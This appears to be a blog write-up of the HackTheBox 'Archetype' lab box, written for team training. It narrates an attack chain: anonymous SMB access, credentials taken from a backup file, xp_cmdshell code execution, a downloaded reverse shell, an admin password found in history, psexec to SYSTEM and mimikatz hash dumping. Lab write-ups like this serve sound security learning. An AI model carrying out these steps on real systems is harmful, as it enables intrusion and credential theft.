Starting Point — Archetype
In an effort to build the capability within my organization to produce more secure, reviewed, and actively tested deliveries; I am putting these reviews together so the team can grow and learn together. Since we formed the team, we started leveraging HackTheBox to have an environment where we can learn and share. The best spot to start is “Starting Point” and here we go. This not only documents the box, but the process I went through to get to the end.
So after firing up the box and turning on the VPN for access, I began with a basic nmap. In order to make my life easier because I NEVER remember the IP addresses, I start with a bash prompt and store the IP in a variable so I don’t have to remember it for each command. My process is to run an nmap on all ports for discovery, then re-run nmap on the ports that were found with the -sC and -sV values and then store the output using -oN in a file. In this case, we found RPC, Netbios, SMB, and MSSQL ports open.
Now it is all about where you want to start, so I started with the low-fruit which is usually checking SMB. I start with checking the default shares with: smbmap -H $IP but that returned nothing. So the next check in my process is to attempt to use anonymous login to see if we can see anything. Since we are on the command-line, I have to escape out the backslashes with backslashes.
So since smbmap didn’t find anything, I tried crackmapexec to see if it could take anonymous and show details.
Since both of these didn’t tell me the permission sets of these shares, I’ll just check each one individually with smbclient. The only one that allowed me to connect without authentication was backups and the only file available in there was one file. I downloaded that file for inspection.
This file had a set of credentials in it for a user called ARCHETYPE\sql_svc. I’ll add this to a file called “creds” that has the format “username:password” for future use. To validate this credential, back to crackmapexec. That was a win!
So if I go back to smbmap with the credentials, I can now see the permissions. As you can see below, we don’t get much more with these creds.
With nothing here and looking at the name being sql_svc, I’ll pause further recon here and move on to the MSSQL port. Since I’m using a linux distro, I’ll leverage the mssqlclient.py toolset. To start, I’ll try the initial attempt.
Says we got an encryption error. Looking at the help on the command, there is another flag to use to switch, let’s try that.
Got a little further, but now there is a new problem with integrated authentication. How to fix this? don’t pull the password from a file, type it in.
Okay, now we got an SQL prompt. Now the recon continues to look around. I prefer to reference this page: Information Gathering | NetSPI SQL Injection Wiki but I have a list of notes that I can check if I don’t have automation. After doing some checking, it appears that we are a dbamin! Well, with that, time to find a way to escalate. I prefer to go here: https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server to start and I started with “xp_cmdshell”.
So now we got RCE on the box as sql_svc, Great! Looking at the permissions, it seems that SeImpersonatePrivilege is on, so there may be a spot for JuicyPotato later. Let’s keep that in mind. Easiest thing for me to do is to download a reverse shell and have it call me so I can get to a full interactive shell. I started by using a nishang shell in /usr/share/nishang/Shells/Invoke-PowerShellTcpOneLine.ps1 and modify it to do my bidding with the correct IP and Port I want to use. I started my python server in the upper-left, turned on my listener on the lower left, then told xp_cmdshell to download the script and pass it to powershell to run.
Now I have a shell and can start enumerating the box with a direct shell instead of through SQL prompt. Instead of manual enumeration, I’ll use the PEAS suite from github and let that enumerate across the system.
So I’m able to download the file, but it gets deleted immediately when it saves. I need to move to a directory that allows me to save and Temp isn’t it. So I go to the Music folder in the user home directory and that allows it to work. However, it still gives me a problem executing it. Looking at my execution policy, it shows “RemoteSigned” which is going to lead to a few more problems. So, I’m going to start doing some initial recon to see what we got for this user. Using gci -Hidden to see what all we got in the home directory, there are a few hidden files. Knowing that most of the user’s applications are in AppData, let’s look through there for files. That gave a lot of desktop.ini files, so let’s remove that from the option.
gci -Force -Recurse -Exclude “desktop.ini” | where {! $_.PSIsContainer}
Now we can scroll through what it found and see if anything is interesting. There are a few that need some investigation, but one is almost always a must: history commands!
And here we have a case where we caught the admin putting in his password. I’ll add that to the creds file I have been making so we can track that. I attempt to launch straight from where I am.
However, it doesn’t work. I forgot I don’t have a tty shell, I just have this reverse shell that isn’t letting me use the full shell. So, let me leverage my unix box and try these creds. I’ll leverage crackmapexec to see if they actually work:
Nice, that “Pwn3d!” word is good to know. So, let’s try to log in as the administrator. I’ll use psexec since we have a C$ share available.
And now we have a shell on the box as system. With this we can look around, input a backdoor, and see if there is more creds we can extract. Just checking the history file for this user, we got nothing. So lets use mimikatz to extract stuff. I was able to pull of hashes for the system. You can pillage all you want, you are system!
That’s enough for this box. Round two next week!